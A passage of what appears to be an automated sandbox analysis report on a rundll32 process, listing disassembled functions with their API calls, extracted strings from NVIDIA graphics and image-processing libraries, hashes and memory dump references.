                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID: %s - CreateFormatConverter failed with %x error,$/tEXt/Software$After WriteSource$Before WriteSource$CNvWICImageTranscoder::performImageTransform$CreateDecoderFromFilename failed with %x error$CreateImageEncoder failed with %x error, returning error$Exit performImageTransform$GEFORCE SHARE$GetColorContexts failed with %x error$GetContainerFormat returned GUID for input image- {%08lX-%04hX-%04hX-%02hhX%02hhX-%02hhX%02hhX%02hhX%02hhX%02hhX%02hhX} for Frame:$GetSize on the decoder object failed with %x error$No input file specified$Not initialized$Unable to copy color contexts failed with %x error$WriteFrame failed with %x error, returning error$m_pEncoder CreateNewFrame failed with %x error$pBitmapFrameEncode->Commit failed with %x error$pBitmapFrameEncode->GetMetadataQueryWriter failed with %x error$pBitmapFrameEncode->Initialize failed with %x error$pBitmapFrameEncode->WriteSource failed with %x error
                                                                                                                                  • API String ID: 2962429428-1590170930
                                                                                                                                  • Opcode ID: 005ad0afa0922d8bc952165cfca8e1ebcd2e45498096374236a38b6566c5fa4a
                                                                                                                                  • Instruction ID: 284f9a3d6af375c6077d59b130e5b5cd1da6aaf8f678ef3151d079029d2b500c
                                                                                                                                  • Opcode Fuzzy Hash: 005ad0afa0922d8bc952165cfca8e1ebcd2e45498096374236a38b6566c5fa4a
                                                                                                                                  • Instruction Fuzzy Hash: 15825936B04B468AFB30CFAAD8A02A937A4FB48B89F114136CE4D57B64DF79E544D740
                                                                                                                                  Function 00007FFD92DB3790 Relevance: 45.2, APIs: 4, Strings: 20, Instructions: 3198COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$DesktopWindow
                                                                                                                                  • String ID: %s - CreateBitmapFromMemory failed with %x error,$%s - CreateBitmapFromSource failed with %x error,$%s - CreateBitmapFromWicBitmap failed with %x error$%s - CreateFormatConverter failed with %x error,$%s - CreateSolidColorBrush failed with %x error$%s - Invalid %x bufferType passed$%s - Invalid wic bitmap passed,$%s - Null or invalid props pointer passed$%s - Total bitmaps to blend together - %d more than 10, resetting to 10$%s- CreateDecoderFromFilename for %s fileName failed with %x error$CNVDirectBlend::getCompositeBitmapFromFileName$CNVDirectBlend::getCompositeBitmapFromFileName$CNVDirectBlend::getD2DBitmap$CreateBitmap failed with %x error$CreateBitmapFromWicBitmap failed with %x error$EndDraw failed with %x error$GetSize on the decoder object failed with %x error$IWICBitmapDecoder::GetFrame failed with %x error$blendEffect->SetValue failed with %x error$getAlphaBitmapFromFileName failed with %x error
                                                                                                                                  • API String ID: 1096970582-137455257
                                                                                                                                  • Opcode ID: e1691c2ccba2f6f4a61cf13629da8745651c466fd281e4823b12a2b796bad9bf
                                                                                                                                  • Instruction ID: a925f2043c6b8156c1eeb88701753a49e27a93046077e242e02bd3eee9e1c506
                                                                                                                                  • Opcode Fuzzy Hash: e1691c2ccba2f6f4a61cf13629da8745651c466fd281e4823b12a2b796bad9bf
                                                                                                                                  • Instruction Fuzzy Hash: 6E338936B09B4586FB20CFAAD4A02AD77A0FB88B89F144536DE4D27B64CF79E441D740
                                                                                                                                  Function 00007FFD92EE03E0 Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 298libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DebugOutputString$AddressProc$DirectoryErrorLastLocalSystem$AllocFreeLibraryLoad
                                                                                                                                  • String ID: *** Error: $*** Signature override detected...$*** WARNING - PE SIGNATURE VERIFICATION FAILED !!!*** Filename: $Advapi32.dll$Ole32.dll$RegCloseKey$RegEnumValueW$RegOpenKeyExW$SOFTWARE\NVIDIA Corporation\Global$StringFromGUID2
                                                                                                                                  • API String ID: 2490301347-1438071108
                                                                                                                                  • Opcode ID: 1d6b9df3eebe2aa38a0ebf8ac068eb6c25e5af42a1da8503f22a176f1522249a
                                                                                                                                  • Instruction ID: 9c1d1193f740434b42e152ea01ac90ca7b30c39ee7e795c45cb201faf2abb773
                                                                                                                                  • Opcode Fuzzy Hash: 1d6b9df3eebe2aa38a0ebf8ac068eb6c25e5af42a1da8503f22a176f1522249a
                                                                                                                                  • Instruction Fuzzy Hash: 7BD18125B09B8386FB249FA5E8A02B973A8FF48755F440139DE4EA3664DF7CE445D700
                                                                                                                                  Function 00007FFD92DC1180 Relevance: 31.9, APIs: 5, Strings: 13, Instructions: 442COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectoryFreeLibrary
                                                                                                                                  • String ID: $%d.%d.%d$%u.%u.%u$.dll$C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$Fallback snippet '%S' missing or corrupted - last error %S$NGXSecureLoadFeature$\nvngx_$\nvngx_config.txt$app %llX feature %S snippet: %S$app_$app_%07llX$warning: skipping downloaded snippet due to lower version %d.%d.%d < %d.%d.%d
                                                                                                                                  • API String ID: 3196203574-130269148
                                                                                                                                  • Opcode ID: e9f055d2c8ab49e8c2135653ee8cf23de3578d4b003e5cf818e5647b115275bf
                                                                                                                                  • Instruction ID: 5cf7a9ef374d128aca8aef3a6b09aada8725e3f928fad15347aa3947f9aaced8
                                                                                                                                  • Opcode Fuzzy Hash: e9f055d2c8ab49e8c2135653ee8cf23de3578d4b003e5cf818e5647b115275bf
                                                                                                                                  • Instruction Fuzzy Hash: F5228E32B08B4685FB20DFA1E8A02EA77A5FB44789F405136DA4D17BA8DF7DE505C780
                                                                                                                                  Function 00007FFD92DB88B0 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 216memorylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLocalProc$AllocErrorLast$Free$AttributesConditionFileInfoMaskVerifyVersion
                                                                                                                                  • String ID: $SetupDiDestroyDeviceInfoList$SetupDiGetDevicePropertyW$SetupGetInfDriverStoreLocationW$Setupapi.dll
                                                                                                                                  • API String ID: 479516965-2442375720
                                                                                                                                  • Opcode ID: 0e7f3fc1ebfef63b9e8befe8db0f7b3ef450d689d6004afb69a9e041b426c530
                                                                                                                                  • Instruction ID: b26c98112448e896520fd2d6ce16cde865e0a24998f2b4a330564be0dd6913b0
                                                                                                                                  • Opcode Fuzzy Hash: 0e7f3fc1ebfef63b9e8befe8db0f7b3ef450d689d6004afb69a9e041b426c530
                                                                                                                                  • Instruction Fuzzy Hash: 75A17E72B09B4286FB74CFA5A8A427A63A9BF48785F440139D94D97BA4EF7DE404C700
                                                                                                                                  Function 00007FFD92DB3830 Relevance: 31.6, APIs: 16, Strings: 1, Instructions: 1866COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1502251526-3916222277
                                                                                                                                  • Opcode ID: 674a90a14dc20a0a4fe1c71672004b2fd67f2de7c674e57dfd894192e2cfb7cc
                                                                                                                                  • Instruction ID: 8679134ffda898324e2fe3578ad54bdef2b0f0da66f3d73d5388a4c0cc2902ef
                                                                                                                                  • Opcode Fuzzy Hash: 674a90a14dc20a0a4fe1c71672004b2fd67f2de7c674e57dfd894192e2cfb7cc
                                                                                                                                  • Instruction Fuzzy Hash: 61032876B085928BF775CEA6D460BF93795FB8478DF001235DA0A57B88DB78EA04CB40
                                                                                                                                  Function 00007FFD92DB59E0 Relevance: 30.2, Strings: 23, Instructions: 1471COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %hs:Height Value passed in JSON not a Number$%hs:Invalid timesstamp %ls value detected in input json$%hs:Json not configured with output params, returning error$%hs:No valid input file passed, returning error$%hs:Width Value passed in JSON not a Number$AAC$C:\dvs\p4\build\sw\tools\rapidjson\1.0.2\include\rapidjson/document.h$CNvJsonMontageConfig::GetOutputParams$GIF$H264$IsObject()$audioChannels$audioCodec$bitsPerSample$duration$filename$fps$height$output$samplingRate$stereo$videoCodec$width
                                                                                                                                  • API String ID: 0-3742049291
                                                                                                                                  • Opcode ID: f68a74a92d9443b856d2b954d6d9bb68834472c632c67feb7962b2c14fc84be8
                                                                                                                                  • Instruction ID: 25fe1f90516747027615412abb021a8502443e071f7fd26dae845e448b4cb703
                                                                                                                                  • Opcode Fuzzy Hash: f68a74a92d9443b856d2b954d6d9bb68834472c632c67feb7962b2c14fc84be8
                                                                                                                                  • Instruction Fuzzy Hash: 1B62B672B1868282FE20DF94E4A42BE7361FB81795F402235EA9E17AD5DFBCE145C740
                                                                                                                                  Function 00007FFD92ED1410 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 170memorylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$ConditionMask$Free$AllocFullInfoNamePathVerifyVersion$AddressProc
                                                                                                                                  • String ID: $$&$*$SHGetFolderPathW$Shell32.dll
                                                                                                                                  • API String ID: 4287201591-2843092907
                                                                                                                                  • Opcode ID: 0d21c32348157cc0ab237aa4f896f8d6952255a1767e61a319935305476e1cf3
                                                                                                                                  • Instruction ID: 0efa6d0d34119eb9bad219ed8d43509560f5c4f15b159ff69f0be99ed55dbab4
                                                                                                                                  • Opcode Fuzzy Hash: 0d21c32348157cc0ab237aa4f896f8d6952255a1767e61a319935305476e1cf3
                                                                                                                                  • Instruction Fuzzy Hash: E571D1A5B0978282FB30CF91B9A42B523A9FF45B91F444238C91E97B94EF7DE401D740
                                                                                                                                  Function 00000001800330A8 Relevance: 29.1, APIs: 19, Instructions: 555COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _invoke_watson$Locale$SleepUpdateUpdate::___updatetlocinfo__updatetmbcinfo_getptd_malloc_crtmalloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3294838543-0
                                                                                                                                  • Opcode ID: 521078f5cd82ac0f084921f5033d007348db3b2902225dc428b05784ca17b11c
                                                                                                                                  • Instruction ID: 084eb429915106ff2183acdcc5e5956807c1a06688872eada26f31bf39ac8827
                                                                                                                                  • Opcode Fuzzy Hash: 521078f5cd82ac0f084921f5033d007348db3b2902225dc428b05784ca17b11c
                                                                                                                                  • Instruction Fuzzy Hash: C8220332320A4882EBA7DA65E51A3EF2391F7497C4F45D126EF4E8E695DF38D6098300
                                                                                                                                  Function 00007FFD92EDC200 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 198libraryloadermemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
